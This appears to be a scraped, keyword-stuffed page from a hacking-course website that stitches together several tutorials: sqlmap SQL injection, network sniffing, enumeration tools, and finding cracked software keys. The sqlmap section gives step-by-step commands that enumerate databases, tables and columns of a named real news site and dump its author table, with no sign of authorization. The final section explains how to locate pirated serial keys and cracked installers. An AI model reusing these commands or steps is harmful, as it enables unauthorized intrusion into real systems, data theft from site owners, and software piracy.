SQLMAP Tutorial | Sql injection complete commands | Kali Linux

   SQLMAP Tutorial for Sql injection 

sql injection complete tutorial, error based sql injection, Double query sql injection, Union Sql injection, sqlmap complete commands, admin login bypass, boolean based sql injection, time based sql injection, blind sql injection, sqlmap complete tutorial cheat sheet, sqlmap tool tutorial.

SQLMAP is the kali linux tool for exploiting sql injection vulnerability in the websites.
Sqlmap can exploit both get method websites & post method websites. To exploit the websites using sqlmap websites should be vulnerable to sql injection.

 Vulnerable Urls

 Lets say there is a web application or website that has a url in it like this 

www.site.com/index.php?id=22

To check above get method url we put single quote on id parameter.

www.site.com/index.php?id=22'

To check the vulnerability, put single quote in the parameter. If this throws an error or reacts in an unexpected scenario. So in this case this website is vulnerable to sql injection.

Step 1:  check help section of sqlmap tool

root@kali:~# sqlmap -h

Step 2: fetching the databases of the website

root@kali:~#  sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 --dbs

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

Step 2: Fetch the Table Names 

root@kali:~# sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 -D dailypak_dailypak --tables

Step 3 : Fetch the columns name 

root@kali:~# sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 -D dailypak_dailypak -T author --columns

step 4: Fetch the Data 

root@kali:~# sqlmap -u http://www.dailypakistan.pk/e-paper/newsdetail.php?id=9 -D dailypak_dailypak -T author -C author_id,author_name,author_name_image --dump

Video Tutorial for sql injection :

sql injection complete tutorial, error based sql injection, Double query sql injection, Union Sql injection, sqlmap complete commands, admin login bypass, boolean based sql injection, time based sql injection, blind sql injection, sqlmap complete tutorial cheat sheet, sqlmap tool tutorial.

Ethical Hacking Sniffing Tools

Ethical Hacking Sniffing Tools 

Ethical Hacking Sniffing Tools, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wireless Sniffers – Sniffing Tools in Ethical Hacking,Active Sniffing Attacks | Ethical Hacking, Ethical Hacking Sniffing in Ethical Hacking Tutorial, What is Network Sniffing ? | Protect Business with Packet Sniffer, What is a sniffer in hacking?, ethical hacking sniffing training and certification in delhi, ethical hacking sniffing training and certification in delhi

Sniffing is a process of capturing and monitoring all the packets travelling around a specific network using some sniffing tools. It is a form of “tapping phone wires”, “listening someone call conversations” and get to know what exactly the conversation is going on. 

It is also called wiretapping applied to the computer networks.

The switch ports if open which are used in large enterprise, then any employee or internal intruder can sniff the whole traffic of the network. It is in the same physical location can plug into the network using Ethernet cable or connect wirelessly to that network and sniff the total traffic without knowing anyone or System Admin.

What can be sniffed?

Our confidential information of network one can sniff:-

1.      Email traffic

2.     Telnet password

   Ethical Hacking Course in Delhi

3.     Web traffics

4.     Router and switch configuration

5.     FTP passwords

6.     DNS traffics

How it works?

A promiscuous mode refers to the unique way of Ethernet hardware, in particular, network interface cards (NICs), that allows an NIC to receive all traffic on the network, even if it is not addressed to this NIC. By default, a NIC ignores all traffic that is not addressed to it, which is done by comparing the destination address of the Ethernet packet with the hardware address (MAC address) of the device. While this makes perfect sense for networking, non-promiscuous mode makes it difficult to use network monitoring and analysis software for diagnosing connectivity issues or traffic accounting.

Type of Sniffing: 

Passive Sniffing

In passive sniffing, the traffic is locked but it is not altered in any way. Passive sniffing allows listening only. It works with Hub devices. On a hub device, the traffic is sent to all the ports. In a network that uses hubs to connect systems, all hosts on the network can see the traffic. Therefore, an attacker can easily capture traffic going through.

The good news is that hubs are almost obsolete nowadays. Most modern networks use switches. Hence, passive sniffing is no more effective.

Cyber Security Course in india 

Active Sniffing

In active sniffing, the traffic is not only locked and monitored, but it may also be altered in some way as determined by the attack. Active sniffing is used to sniff a switch-based network. It involves injecting address resolution packets(ARP) into a target network to flood on the switch content addressable memory(CAM) table. CAM keeps track of which host is connected to which port.

Following are the Active Sniffing Techniques −

• MAC Flooding
• DHCP Attacks
• DNS Poisoning
• Spoofing Attacks
• ARP Poisoning

Protocols which are affected

Protocols such as the tried and true TCP/IP were never designed with security in mind and therefore do not offer much resistance to potential intruders. Several rules lend themselves to easy sniffing −

·      HTTP− It is used to send information in the clear text without any encryption and thus a real target.

·      SMTP(Simple Mail Transfer Protocol) − SMTP is basically utilized in the transfer of emails. This protocol is efficient, but it does not include any protection against sniffing.

·      NNTP(Network News Transfer Protocol) − It is used for all types of communications, but its main drawback is that data and even passwords are sent over the network as clear text.

·      POP(Post Office Protocol) − POP is strictly used to receive emails from the servers. This protocol does not include protection against sniffing because it can be trapped.

·      FTP(File Transfer Protocol) − FTP is used to send and receive files, but it does not offer any security features. All the data is sent as clear text that can be easily sniffed.

·      IMAP(Internet Message Access Protocol) − IMAP is same as SMTP in its functions, but it is highly vulnerable to sniffing.

·      Telnet− Telnet sends everything (usernames, passwords, keystrokes) over the network as clear text and hence, it can be easily sniffed.

Sniffers are not the dumb utilities that allow you to view only live traffic. If you really want to analyse each packet, save the capture and review it whenever time allows.

Tools for Sniffing:

1.     Solar Winds Packet Analysis Bundle.

2.    Wireshark

3.    PRTG Network Monitor

4.    Steel central Packet Analyzer

5.    Tcpdump

6.    Network Miner

7.    Kismet

8.    Fiddler

Ethical Hacking Sniffing Tools, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wifi Sniffer: Tools for Detecting Packet Sniffers, Wireless Sniffers – Sniffing Tools in Ethical Hacking,Active Sniffing Attacks | Ethical Hacking, Ethical Hacking Sniffing in Ethical Hacking Tutorial, What is Network Sniffing ? | Protect Business with Packet Sniffer, What is a sniffer in hacking?, ethical hacking sniffing training and certification in delhi, ethical hacking sniffing training and certification in delhi

Enumeration in Ethical Hacking | Information Gathering | Finding Subdomains of a website

Subdomain Scanner | Digital Footprinting | Enumeration of a domain

The information Gathering phase of Ethical Hacking, which is first phase, is called as the process of Enumeration. The attacker identifies as many attack vectors as possible by establishing as active connection with the victim. It is a process of extracting user names, machine names, and shares, network resources, running process and running services from the system. 

Ethical Hacking Course in india

The gathered information is used to identify the vulnerabilities or weak points in system security and tries to exploit in the System gaining phase.

Types of Information Enumerated by Intruders:

èUsers and Groups 

èNetwork Resource and Shares

èRouting Tables

èAuditing and Service settings

èMachine names

èSNMP and DNS details

èApplications and Banners.

èARP and CAM tables

èPasswords policies list

Services and Port to Enumerate:

èBrute Force to Active Directory

èExtract user groups from windows

èExtract user names using SNMP

èExtracting user names using email Id’s

èExtracting information using DNS Zone transfer

Service and Port to Enumerate:

è53 – for DNS Zone Transfer

è137 – for NetBIOS Name service

è135 – for Microsoft RPC Endpoint Mapper

è139 – for NetBIOS session service 

è161 – for SNMP 

è389 – for LDAP (Lightweight Directory Protocol)

è445 – for SMB (Samba service) over TCP 

è25 – for SMTP (Simple Mail transfer Protocol)

Tools for Enumerations: 

èNBTscan

èDumpSec

èLegion

èNat

èSMBScanner

èNBTDump

èNBTEnum

èNetcat

èNmap

èDNSEnum

èNTP Suite

Let’s have a look in Examples:

1.     Enum4linux:It is used to enumerate Linux systems, but we enumerate windows OS also. Below is snapshot you can refer it.

Here, you can see the options available through this attribute we can fetch out the information related to Linux OS.

Check this scan done on Windows 7 x64 bit Ultimate version.

In above figure, you can check out Domain/Workgroupof the Target, Service is running on it. And see the MAC addressis also fetched. 

1.    Dnsenum:  This tool is for Enumerating Domain Name System, including MX Records, Reverse Lookup, CNAME and Whois lookup.

Check the options available in Dnsenum tool.

Now check the result given by this tool, when we enumerate Alibaba’s website www.alibaba.com. 

In above figure, we can see the Host addresses, Name Servers and Mail Exchange server information.

Here we Result from Google, like CNMAE and its subdomain information.

How to find Any software serial key by using 94fbr | Crack any software | find any software product key

How to find Any software serial key by using 94fbr

You can find any software serial keys by using 94fbr of any software 

 here are the list of the softwares you can find out serial keys of these software by searching the keyword at google.

step 1: Search on the google : software name 94fbr

step 2: click on the below links, all the links will be related to the cracked version of the software which you search on the google.

step 3: you can watch this video for full crack of any software.

step 4 : These are the steps you can perform the crack of any software.

1.vmware workstation pro 94fbr

2. windows xp sp2 94fbr

3. windows 7 home basic 94fbr

4. internet download manager 94fbr

5.adobe premiere 94fbr

6.malware bytes 94fbr

7. photoshop pro 94fbr

8. avast antivirus 94fbr

9. quick heal antivirus 94fbr

10. Plex 94fbr

11. Revo uninstaller pro 94fbr

12. microsoft office 365 94fbr

13. FL Studio Groove 94fbr

14. Adobe Creative Cloud 94fbr

15. Display Fusion 94fbr

16. Wolframalpha 94fbr

17. Total Commander 94fbr

18. Enpass 94fbr

19. Dropbox 94fbr

20. filmora getintopc.com

21. Photoshop getintopc.com

22. FL Studio Groove getintopc.com

or you can search on google software name getintopc.com